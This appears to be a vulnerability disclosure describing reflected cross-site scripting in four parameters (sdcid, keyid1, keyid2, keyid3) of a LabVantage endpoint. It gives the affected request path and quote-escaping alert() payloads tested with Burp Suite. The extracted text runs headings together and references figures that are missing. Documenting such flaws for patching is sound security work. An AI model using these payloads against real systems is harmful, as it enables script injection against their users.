POST /labvantage/rc?command=file&file=WEB-CORE/elements/files/filesembedded.jspsdcid, keyid1, keyid2, keyid3The following steps were used to identify and confirm the reflected XSS vulnerability in the sdcid, keyid1, keyid2, and keyid3 parameters of the POST request to the affected endpoint. The testing was conducted using Burp Suite.
sdcid: sdcid=SDINote';alert("pwnandpatch-1");'keyid1: keyid1=X';alert("pwnandpatch-2");'keyid2: keyid2=';alert("pwnandpatch-3");'keyid3: keyid3=';alert("pwnandpatch-4");'
Figure 1: The request made by adding XSS payloads to the sdcid, keyid1, keyid2, and keyid3 parameters.
sdcid Parametersdcid parameter was sent.pwnandpatch-1 was triggered.
Figure 2: The alert appears when the XSS payload is injected into the sdcid parameter.
keyid1 Parameterkeyid1 parameter was sent.pwnandpatch-2 was triggered.